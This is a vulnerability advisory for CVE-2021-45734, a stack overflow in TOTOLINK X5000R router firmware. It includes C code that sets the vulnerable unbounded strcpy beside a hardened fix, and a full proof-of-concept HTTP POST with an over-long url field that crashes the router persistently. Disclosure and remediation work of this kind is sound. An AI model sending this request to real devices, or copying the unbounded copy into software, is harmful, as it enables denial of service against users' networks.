CVE-2021-45734: my_vuln/10.md at main · pjqwudi/my_vuln

TOTOLINK X5000R v9.1.0u.6118_B20201102 was discovered to contain a stack overflow in the function setUrlFilterRules. This vulnerability allows attackers to cause a Denial of Service (DoS) via the url parameter.


TOTOLINK Vulnerability

Vendor: TOTOLINK

Product: X5000R

Version: X5000R_Firmware (V9.1.0u.6118_B20201102)

Type: Stack Overflow

Author: Jiaqian Peng, Huizhao Wang

Institution: [email protected], [email protected]

Vulnerability description

We found a stack overflow vulnerability in a recently released firmware for a TOTOLINK Technology router. It allows remote attackers to crash the server.

Stack Overflow

In the cstecgi.cgi binary:

In the setUrlFilterRules function, the url field is taken directly from the attacker's request. The input is not checked, and the function then calls nvram_set to store it. If the value is too long it later causes a stack overflow, so controlling url is enough to crash the server.

In the rc binary:

Eventually the stored value is read back, and this is where the stack overflow occurs.

The input array (v3 in the decompiled output) is only 256 bytes long. Supplying a url value longer than that, such as a very long string, overwrites the data beyond the buffer, including the function's return address.

Supplement

To avoid problems of this kind, we believe the string content should be checked where the input is extracted, before it is stored.
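The two-stage flow described above (unchecked store in cstecgi.cgi, unbounded copy into a 256-byte stack buffer in rc) and the fix recommended in the supplement, modelled in C as an added example. This is not code from the router firmware or from the advisory's authors: nvram_set and nvram_get are stand-ins for the firmware's NVRAM library written for this example only, and the function names, the 4096-byte NVRAM slot, and the sample rule value are assumptions. The hardened version checks the length at the extraction point, as the supplement suggests, and additionally makes the rc-side consumer fail closed on anything that would not fit, since NVRAM can be written by other paths.

```c
#include <stdio.h>
#include <string.h>

#define RULE_BUF_SIZE 256                 /* size of the stack array v3 in rc */
#define MAX_URL_LEN   (RULE_BUF_SIZE - 1) /* longest value that fits with its NUL */

/* Hypothetical stand-in for the router's NVRAM: one key ("url"), one value.
 * The real nvram_set/nvram_get are firmware library calls; these are models
 * written for this example only. */
#define NVRAM_VALUE_MAX 4096
static char g_nvram_url[NVRAM_VALUE_MAX];
static int  g_nvram_url_set = 0;

/* strnlen equivalent, kept local so the example has no POSIX dependency. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

static int nvram_set(const char *key, const char *value)
{
    if (strcmp(key, "url") != 0 || value == NULL)
        return -1;
    size_t n = bounded_len(value, NVRAM_VALUE_MAX - 1);
    memcpy(g_nvram_url, value, n);
    g_nvram_url[n] = '\0';
    g_nvram_url_set = 1;
    return 0;
}

static const char *nvram_get(const char *key)
{
    if (strcmp(key, "url") != 0 || !g_nvram_url_set)
        return NULL;
    return g_nvram_url;
}

/* --- Vulnerable flow, as the write-up describes it ---------------------- */

/* cstecgi.cgi side: the attacker's url is stored with no length check. */
int set_url_filter_rules_vuln(const char *url)
{
    return nvram_set("url", url);
}

/* rc side: the stored value is copied into a 256-byte stack buffer with an
 * unbounded strcpy. A value of 256 bytes or more runs past v3 and overwrites
 * the saved return address. Not called by the tests; shown beside the fix. */
void rc_load_url_rules_vuln(void)
{
    char v3[RULE_BUF_SIZE];
    const char *stored = nvram_get("url");
    if (stored == NULL)
        return;
    strcpy(v3, stored);               /* BUG: no bound on the copy */
    printf("vuln: loaded rule %s\n", v3);
}

/* --- Hardened flow ------------------------------------------------------- */

/* Reject over-long values at the input-extraction point, before nvram_set. */
int set_url_filter_rules_fixed(const char *url)
{
    if (url == NULL)
        return -1;
    if (bounded_len(url, MAX_URL_LEN + 1) > MAX_URL_LEN)
        return -1;                    /* longer than the rc buffer can hold */
    return nvram_set("url", url);
}

/* Bounded copy in rc. Anything that would not fit is rejected rather than
 * silently truncated. Returns the rule length on success, -1 on failure. */
int rc_load_url_rules_fixed(void)
{
    char v3[RULE_BUF_SIZE];
    const char *stored = nvram_get("url");
    if (stored == NULL)
        return -1;
    size_t n = bounded_len(stored, RULE_BUF_SIZE);
    if (n >= RULE_BUF_SIZE)
        return -1;                    /* would overflow v3 */
    memcpy(v3, stored, n + 1);
    return (int)n;
}

/* Test helper: a string of n 'a' characters, like the PoC payload. */
const char *a_string(size_t n)
{
    static char buf[NVRAM_VALUE_MAX];
    if (n > NVRAM_VALUE_MAX - 1)
        n = NVRAM_VALUE_MAX - 1;
    memset(buf, 'a', n);
    buf[n] = '\0';
    return buf;
}

int main(void)
{
    /* Attacker stores a 1600-byte url through the unchecked setter; the
     * hardened rc consumer refuses to copy it instead of overflowing v3. */
    set_url_filter_rules_vuln(a_string(1600));
    printf("fixed rc with 1600-byte value: %d\n", rc_load_url_rules_fixed());

    /* The hardened setter refuses the same value up front. */
    printf("fixed setter with 1600-byte value: %d\n",
           set_url_filter_rules_fixed(a_string(1600)));

    /* A normal rule passes both checks. */
    set_url_filter_rules_fixed("http://example.com/blocked");
    printf("fixed rc with normal value: %d\n", rc_load_url_rules_fixed());
    return 0;
}
```

The check in set_url_filter_rules_fixed is the one the supplement asks for; the check in rc_load_url_rules_fixed is defence in depth, because the stack buffer in rc is the actual sink and should not depend on every writer of the NVRAM key having validated its input.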

PoC

We set url to a long run of "a" characters (aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa…), and the router crashes. The request used:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1677
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/urlf.html
Cookie: SESSION_ID=2:1420070644:2

{"url":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","addEffect":"1","topicurl":"setUrlFilterRules"}

Result

The target router crashes and can no longer provide service; the denial of service is persistent.
